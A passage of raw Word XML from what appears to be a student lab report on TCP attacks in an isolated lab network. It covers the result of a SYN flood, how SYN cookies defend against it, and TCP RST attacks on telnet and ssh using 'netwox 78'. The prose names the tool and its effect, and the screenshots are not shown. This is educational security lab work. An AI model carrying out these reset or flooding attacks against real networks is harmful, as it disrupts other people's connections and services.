          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75D8FBBB" wp14:editId="60D2CC2A">
            <wp:extent cx="5930900" cy="736600"/>
            <wp:effectExtent l="0" t="0" r="12700" b="0"/>
            <wp:docPr id="16" name="Picture 16" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-02-27%20at%205.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s/Screen%20Shot%202018-02-27%20at%205.29.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736600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="080C439B" w14:textId="77777777" w:rsidR="00A52910" w:rsidRDefault="00A52910" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="584BE5D4" w14:textId="364072FF" w:rsidR="00A3789B" w:rsidRDefault="00161520" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AEE479C" wp14:editId="15AD591D">
            <wp:extent cx="5930900" cy="3708400"/>
            <wp:effectExtent l="0" t="0" r="12700" b="0"/>
            <wp:docPr id="17" name="Picture 17" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-02-27%20at%205.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s/Screen%20Shot%202018-02-27%20at%205.30.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23DA952" w14:textId="77777777" w:rsidR="00161520" w:rsidRDefault="00161520" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72959FB4" w14:textId="77777777" w:rsidR="00161520" w:rsidRDefault="00161520" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="711CB253" w14:textId="0A9BE570" w:rsidR="00161520" w:rsidRDefault="00161520" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Connection from client is not successful now.</w:t>
      </w:r>
      <w:r w:rsidR="00D306B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> So attack is successful i.e., telnet service failed hence the service was denied because of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339199C2" w14:textId="77777777" w:rsidR="00161520" w:rsidRDefault="00161520" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F216C1" w14:textId="38947D24" w:rsidR="00161520" w:rsidRDefault="00161520" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="107A1769" wp14:editId="5B5A7702">
            <wp:extent cx="5943600" cy="1282700"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>
            <wp:docPr id="18" name="Picture 18" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-02-27%20at%205.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s/Screen%20Shot%202018-02-27%20at%205.30.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82700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="177E47D5" w14:textId="77777777" w:rsidR="001469FA" w:rsidRDefault="001469FA" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629668A7" w14:textId="764EB1F7" w:rsidR="001469FA" w:rsidRDefault="001469FA" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the SYN COOKIE mechanism is triggered, the server will not allocate TCB (transmission control blocks) for half open connections. It will use the information of TCB to be encoded into SYN COOKIE sequence number </w:t>
      </w:r>
      <w:r w:rsidR="00F53441">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">and sends it to the client </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">and hence the buffer space is not </w:t>
      </w:r>
      <w:r w:rsidR="00F53441">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>filled. When</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the client sends the ACK along with next sequence number (SYN COOKIE+1), the server will know it as legitimate client and then connection is established. This is how SYN COOKIE counter measure will help to avoid SYN Flooding attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68681C86" w14:textId="77777777" w:rsidR="001469FA" w:rsidRDefault="001469FA" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBF983E" w14:textId="77777777" w:rsidR="00161520" w:rsidRPr="00796560" w:rsidRDefault="00161520" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A35FFD0" w14:textId="59B490FA" w:rsidR="002B2CF3" w:rsidRPr="00796560" w:rsidRDefault="002B2CF3" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796560">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task 2</w:t>
      </w:r>
      <w:r w:rsidR="00465E84">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00796560" w:rsidRPr="00796560">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP RST Attacks on telnet and ssh Connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D64EEB1" w14:textId="1A2F1336" w:rsidR="0098121B" w:rsidRDefault="00151A29" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">First a telnet is successful between client (10.0.2.6) and </w:t>
      </w:r>
      <w:r w:rsidR="001A1452">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>server (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>10.0.2.5). We will use attacker in the same network to reset this connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D526812" w14:textId="77777777" w:rsidR="00E52F42" w:rsidRDefault="00E52F42" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6F5787" w14:textId="6A102B4D" w:rsidR="00E52F42" w:rsidRDefault="00E52F42" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B1948E0" wp14:editId="1C5AFFB3">
            <wp:extent cx="5930900" cy="3695700"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
            <wp:docPr id="24" name="Picture 24" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-02-27%20at%206.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Screenshots/Screen%20Shot%202018-02-27%20at%206.41.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695700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D997A" w14:textId="77777777" w:rsidR="00E52F42" w:rsidRDefault="00E52F42" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05BDD204" w14:textId="77777777" w:rsidR="00E52F42" w:rsidRDefault="00E52F42" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C45D731" w14:textId="0B8DD415" w:rsidR="00151A29" w:rsidRDefault="00E52F42" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Now from </w:t>
      </w:r>
      <w:r w:rsidR="00EC2D11">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>attacker (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>with IP 10.0.2.4)</w:t>
      </w:r>
      <w:r w:rsidR="00EC2D11">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> we issue the netwox 78 command to reset the connection and we are successful. Here –I </w:t>
      </w:r>
      <w:r w:rsidR="00C83AE1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>refer</w:t>
      </w:r>
      <w:r w:rsidR="00EC2D11">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to limit the list of IP addresses to reset. So all the TCP connections associated with 10.0.2.6 are reset. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5D36FD" w14:textId="38F22A6D" w:rsidR="00151A29" w:rsidRDefault="00E52F42" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FFBD79F" wp14:editId="563E8E9E">
            <wp:extent cx="5943600" cy="1625600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Picture 23" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-02-27%20at%206.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Screenshots/Screen%20Shot%202018-02-27%20at%206.44.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25600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B222F3" w14:textId="77777777" w:rsidR="004D2017" w:rsidRDefault="004D2017" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F3A29D" w14:textId="77777777" w:rsidR="004D2017" w:rsidRDefault="004D2017" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AB22ED0" w14:textId="77777777" w:rsidR="004D2017" w:rsidRDefault="004D2017" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6AFB46" w14:textId="77777777" w:rsidR="00C93C2A" w:rsidRDefault="00C93C2A" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CBBCEDB" w14:textId="0C7E7B83" w:rsidR="00491EE6" w:rsidRDefault="004D2017" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54138E5A" wp14:editId="5F4245D9">
            <wp:extent cx="5930900" cy="3708400"/>
            <wp:effectExtent l="0" t="0" r="12700" b="0"/>
            <wp:docPr id="26" name="Picture 26" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-02-27%20at%206.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Screenshots/Screen%20Shot%202018-02-27%20at%206.54.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76EE96B4" w14:textId="77777777" w:rsidR="004D2017" w:rsidRDefault="004D2017" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5492C7D2" w14:textId="0ECB7E1C" w:rsidR="00491EE6" w:rsidRDefault="004D2017" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Now the telnet connection is closed at 18:41 </w:t>
      </w:r>
      <w:r w:rsidR="004862FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">in the highlighted text above </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>and observe the RST packets on Wireshark on the server side at 18:41)</w:t>
      </w:r>
      <w:r w:rsidR="004862FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.  A</w:t>
      </w:r>
      <w:r w:rsidR="00491EE6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ll the Reset packets are actually sent by the attacker with correct sequence numbers after observing the flow between client and </w:t>
      </w:r>
      <w:r w:rsidR="005E25EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>server. The</w:t>
      </w:r>
      <w:r w:rsidR="00357316">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> “netwox 7</w:t>
      </w:r>
      <w:r w:rsidR="005E25EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00357316">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="005E25EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00357316">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">command </w:t>
      </w:r>
      <w:r w:rsidR="005E25EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">sniffs the TCP packets and </w:t>
      </w:r>
      <w:r w:rsidR="00357316">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sends the RST packets with the next possible sequence numbers to reset the connection reducing the burden of attacker</w:t>
      </w:r>
      <w:r w:rsidR="004862FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to guess sequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFB76AE" w14:textId="4031F250" w:rsidR="00491EE6" w:rsidRDefault="00491EE6" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C9A4DAC" wp14:editId="6077FDA7">
            <wp:extent cx="5943600" cy="3355340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="Picture 25" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-02-27%20at%206.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Screenshots/Screen%20Shot%202018-02-27%20at%206.51.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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56368718" w14:textId="77777777" w:rsidR="00C93C2A" w:rsidRDefault="00C93C2A" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60C4B1C2" w14:textId="77777777" w:rsidR="00223322" w:rsidRDefault="00223322" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="096BD5D2" w14:textId="7285C637" w:rsidR="00223322" w:rsidRDefault="00400810" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Now we try the same attack using ssh connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4502A002" w14:textId="77777777" w:rsidR="0019640C" w:rsidRDefault="0019640C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665E332A" w14:textId="46DDC606" w:rsidR="0019640C" w:rsidRDefault="0019640C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ssh login is successful from client(10.0.2.6) to server(10.0.2.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11122AB0" w14:textId="39755C2E" w:rsidR="00400810" w:rsidRDefault="0019640C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7253E5B4" wp14:editId="5AB3A95E">
            <wp:extent cx="5930900" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
            <wp:docPr id="27" name="Picture 27" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-02-27%20at%206.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Screenshots/Screen%20Shot%202018-02-27%20at%206.57.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1892300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C4541C" w14:textId="77777777" w:rsidR="0019640C" w:rsidRDefault="0019640C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03DB7B56" w14:textId="77777777" w:rsidR="0019640C" w:rsidRDefault="0019640C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16173875" w14:textId="77777777" w:rsidR="0019640C" w:rsidRDefault="0019640C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BFD7BDF" w14:textId="77777777" w:rsidR="0019640C" w:rsidRPr="000D41D8" w:rsidRDefault="0019640C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46861E1C" w14:textId="26C9380D" w:rsidR="0019640C" w:rsidRDefault="0019640C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D41D8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ED31F3E" wp14:editId="728D036C">
            <wp:extent cx="5930900" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
            <wp:docPr id="29" name="Picture 29" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-02-27%20at%207.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Screenshots/Screen%20Shot%202018-02-27%20at%207.00.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1181100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B07007" w14:textId="77777777" w:rsidR="00CF5196" w:rsidRPr="000D41D8" w:rsidRDefault="00CF5196" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10782145" w14:textId="77777777" w:rsidR="0019640C" w:rsidRPr="000D41D8" w:rsidRDefault="0019640C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F7DF3E6" w14:textId="77777777" w:rsidR="0019640C" w:rsidRPr="000D41D8" w:rsidRDefault="0019640C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C13FAD" w14:textId="77777777" w:rsidR="0019640C" w:rsidRPr="000D41D8" w:rsidRDefault="0019640C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B4863E" w14:textId="70EF25A6" w:rsidR="0019640C" w:rsidRPr="000D41D8" w:rsidRDefault="0019640C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D41D8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F2B11C6" wp14:editId="00023D1D">
            <wp:extent cx="5930900" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="12700" b="0"/>
            <wp:docPr id="28" name="Picture 28" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-02-27%20at%206.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Screenshots/Screen%20Shot%202018-02-27%20at%206.59.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2057400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21844047" w14:textId="77777777" w:rsidR="0019640C" w:rsidRPr="000D41D8" w:rsidRDefault="0019640C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="490A9E79" w14:textId="68AC58D2" w:rsidR="0019640C" w:rsidRPr="00525BC3" w:rsidRDefault="0019640C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00525BC3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>The connection i</w:t>
      </w:r>
      <w:r w:rsidR="000266F1" w:rsidRPr="00525BC3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">s now broken on the client side as well and the attack is successful. </w:t>
      </w:r>
      <w:r w:rsidR="00BA5FDC" w:rsidRPr="00525BC3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ssh only encrypts the data part and the TCP header can easily be spoofed and hence it is successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AF1458" w14:textId="77777777" w:rsidR="00BA5FDC" w:rsidRPr="000D41D8" w:rsidRDefault="00BA5FDC" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D85CDC" w14:textId="77777777" w:rsidR="00BA5FDC" w:rsidRPr="000D41D8" w:rsidRDefault="00BA5FDC" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7154282A" w14:textId="3AA6BDBD" w:rsidR="0009526D" w:rsidRPr="000D41D8" w:rsidRDefault="00324BDC" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D41D8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task 3: TCP RST Attacks on Video Streaming Applications</w:t>
      </w:r>
    </w:p>
